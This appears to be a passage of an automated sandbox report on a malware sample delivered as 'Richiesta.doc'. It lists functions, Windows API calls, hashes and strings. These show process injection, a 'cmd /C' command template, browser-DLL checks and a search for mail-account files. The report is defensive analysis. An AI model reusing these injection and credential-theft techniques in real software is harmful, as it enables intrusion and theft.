  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68439

General

Root Process Name:d3d8sext.exe
Process MD5:AD22F7E25E6FCCF900B5060D4C5E9532
Total matches:172
Initial Analysis Report:Open
Initial sample Analysis ID:68439
Initial sample SHA 256:78E57715D0C6C12E90E96D82B3FF839B78C421F5EFF663AAB6D19DA5B6D82200
Initial sample name:Richiesta.doc

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
